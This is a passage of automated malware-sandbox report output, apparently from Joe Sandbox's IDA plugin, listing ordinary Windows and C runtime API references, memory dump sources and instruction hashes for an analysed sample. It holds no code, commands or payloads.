                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                        • String ID: F(@
                                                                                                                                                                                                                                        • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                        • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                        • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                        • String ID: pScheduler
                                                                                                                                                                                                                                        • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                        • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                        • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                        • String ID: pContext
                                                                                                                                                                                                                                        • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                        • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                        • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                        • String ID: B
                                                                                                                                                                                                                                        • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                        • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                        • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                        • String ID: pScheduler$version
                                                                                                                                                                                                                                        • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                        • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                        • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                        • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                        • Instruction ID: 2bc27ada5e877878674faf6394a70eba83bbaa7f0f8e0403da81eb18bc050389
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0A156729807A6EFDB258F28C8947AEBBE7EF11350F5441EDD8A59B281C3358941CB50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                        • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                        • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                        • Opcode ID: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                                                                                                                                                                                                        • Instruction ID: 1ace62052ea4616b78d87615e6a12090242bd0d6d96ad174f7f281d701fb66cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E941D831AC0134EFDB256FB88C44AAE36A6EF47770F2406D5FC38D6690DB7645428AA1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                        • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                        • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0215047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02156B51
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02156BDA
                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02156BEC
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 02156BF5
                                                                                                                                                                                                                                          • Part of subcall function 0215390E: RtlAllocateHeap.NTDLL(00000000,0212DAD7,00000000), ref: 02153940
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2652629310-0
                                                                                                                                                                                                                                        • Opcode ID: 741c0c8b2752cf52d6a3b4cb7e308d013327ca6cb40bf2aaa7dfc05a94fe856d
                                                                                                                                                                                                                                        • Instruction ID: 7546205f806d9507a61beecbc94b61bc4ce8aabf084f2e4960a390bcd2a98bd7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 741c0c8b2752cf52d6a3b4cb7e308d013327ca6cb40bf2aaa7dfc05a94fe856d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B31CE72A4066AEFDF348F64CC40DAE7BA9EB40714F4542A8EC24D7160EB36D951CB90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                        • Instruction ID: bb329524dca0bd3ab87e1a818bb4d5d520ae45e4fde31a30b88687ac4e352a0e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B215E75A40229AFDF14EFA4DC819BEB7B9EF09714F100065F901A7290D774AD19CFA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                        • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                                                                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                                                                                                                                                          • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                                                                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2630251706-0
                                                                                                                                                                                                                                        • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                        • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                                                                                                                                                        • UpdateWindow.USER32 ref: 00401FB7
                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                                                                                                                                                        • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1339878773-0
                                                                                                                                                                                                                                        • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                        • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0214934A
                                                                                                                                                                                                                                          • Part of subcall function 02149297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021492C6
                                                                                                                                                                                                                                          • Part of subcall function 02149297: ___AdjustPointer.LIBCMT ref: 021492E1
                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0214935F
                                                                                                                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02149370
                                                                                                                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 02149398
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                                                                                                                        • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                        • Instruction ID: cb61b5a54968ab3d4afdac3cf398c751c420222af53e8240ecf1b484c4b9c952
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8011772140148BFCF125E95CC40EEB3F6AEF89758F044018FE0C56120DB32E861ABA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                                                                                                                                                          • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                                                                                                                                                          • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                                                                                                                        • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                        • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0215513D,00000000,00000000,00000000,00000000,?,021553F5,00000006,0044A378), ref: 021551C8
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0215513D,00000000,00000000,00000000,00000000,?,021553F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02152213), ref: 021551D4
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0215513D,00000000,00000000,00000000,00000000,?,021553F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021551E2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                        • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                        • Instruction ID: 2ed5a1dcec2172192b4ee34b33c269e58c2ec7f3438fd679206c40b2e0184191
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3501F736682232FBC7214F699C84E56BF9AAF46FA27510670FD36E7140C720D900CAE8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                        • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                        • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021463AF
                                                                                                                                                                                                                                        • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021463C3
                                                                                                                                                                                                                                        • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021463DB
                                                                                                                                                                                                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021463F3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 78362717-0
                                                                                                                                                                                                                                        • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                        • Instruction ID: d247ff5a3331e6a0629e962858cdf4f75aa4b87b46303404968d01bd186b065b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2401A232640254ABCF16EA54D840AAF779E9B86768F010015EC29A7281DF70ED118AA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 02142BB1
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02142BCF
                                                                                                                                                                                                                                          • Part of subcall function 02138687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021386A8
                                                                                                                                                                                                                                          • Part of subcall function 02138687: Hash.LIBCMT ref: 021386E8
                                                                                                                                                                                                                                        • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02142BD8
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02142BF8
                                                                                                                                                                                                                                          • Part of subcall function 0213F6DF: Hash.LIBCMT ref: 0213F6F1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
